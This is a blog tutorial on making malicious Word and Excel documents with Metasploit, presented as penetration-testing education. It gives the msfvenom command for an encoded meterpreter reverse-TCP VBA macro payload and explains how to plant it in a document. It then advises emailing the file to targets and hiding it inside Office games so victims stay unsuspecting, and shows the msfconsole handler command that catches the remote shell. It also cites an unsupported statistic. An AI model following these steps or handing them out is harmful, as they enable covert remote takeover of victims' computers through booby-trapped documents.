Home / Hacking / Word / Excel Exploits using Metasploit During Penetration Testing

Word / Excel Exploits using Metasploit During Penetration Testing

Word / Excel Exploits using Metasploit During Penetration Testing

Metasploit is the favorite exploitation framework among the penetration testers . can be used in a variety of scenarios . One of the easiest way of spreading the exploit code through an exe file . But the major drawback in this technique is that the Antiviruses might catch the EXE as malicious as the AV engines more cautious for the PE files . So are the Targets now .

The Good News : Metasploit comes with Exploits for the Word and Excel Too . This means that you can create malicious word / excel documents that can give a reverse shell to you the same way the native exe (PE) files do . This is great strategy to use in your penetration tests to see what defence we are holding against these attacks .

The statistics suggest that these days 90% of attacks are completed using Word/Excel Documents .

Here is a on how to generate Word/Excel Exploits using Metasploit

Word / Excel Exploits using Metasploit During Penetration Testing

Word / Excel Exploits using Metasploit During Penetration Tests

Fire up your Box and open msfcosole in the terminal .  Following is a step by step command line tutorial of the Attack.

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST= LPORT=8080 -e x86/shikata_ga_nai -f vba-exe

The Output you shall get is : 

Found 1 compatible encoders
 Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
 x86/shikata_ga_nai succeeded with size 326 (iteration=0)
 x86/shikata_ga_nai chosen with final size 326
 Payload size: 326 bytes
 '* This code is now split into two pieces:
 '*  1. The Macro. This must be copied into the Office document
 '*     macro editor. This macro will run on startup.
 '*  2. The Data. The hex dump at the end of this output must be
 '*     appended to the end of the document contents.

As the output message, indicates, the script is in 2 parts.

The first part of the script is created as a macro and the second part is appended into the document text itself.

You will need to transfer this script over to a machine with Windows and Office installed and perform the following:
Word/Excel 2003: Tools -> Macros -> Visual Basic Editor
Word/Excel 2007: View Macros -> then place a name like “v@nsh!t” and select “create”.

This will open up the visual basic editor. Paste the output of the first portion of the payload script into the editor, save it and then paste the remainder of the script into thel word document itself. This is when you would perform the client-side attack by emailing this Word document to someone.

In order to keep user suspicion low, try embedding the code in one of the many Word/Excel games that are available on the Internet. That way, the user is happily playing the game while you are working in the background. This gives you some extra time to migrate to another process if you are using Meterpreter as a payload.

once you done that open the payload handler:

msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST; set LPORT 8080; run; exit -y"

This is it . Now your Word/Excel document is ready to be sent to the target . When the document is opened at the other end you will get a meterpreter shell as you get in case of EXE payloads .

#Purely for Educational Purposes . Penetration testing without permission is Illegal .

Please Comment in case of any doubts . Like and Share if this was helpful .

About Vanshit Malhotra

Ethical Hacker | Cyber Forensics Investigator | Information Security Consultant Expert at security tactics orchestrating operations to fit strategy. With a 3 + years of experience in various domains of Information Security , I have been able to solve very complex security problems across many technologies and then teach and enable the clients to do the same. #Please Like , Share and Comment if our Posts are helpful to you .

Leave a Comment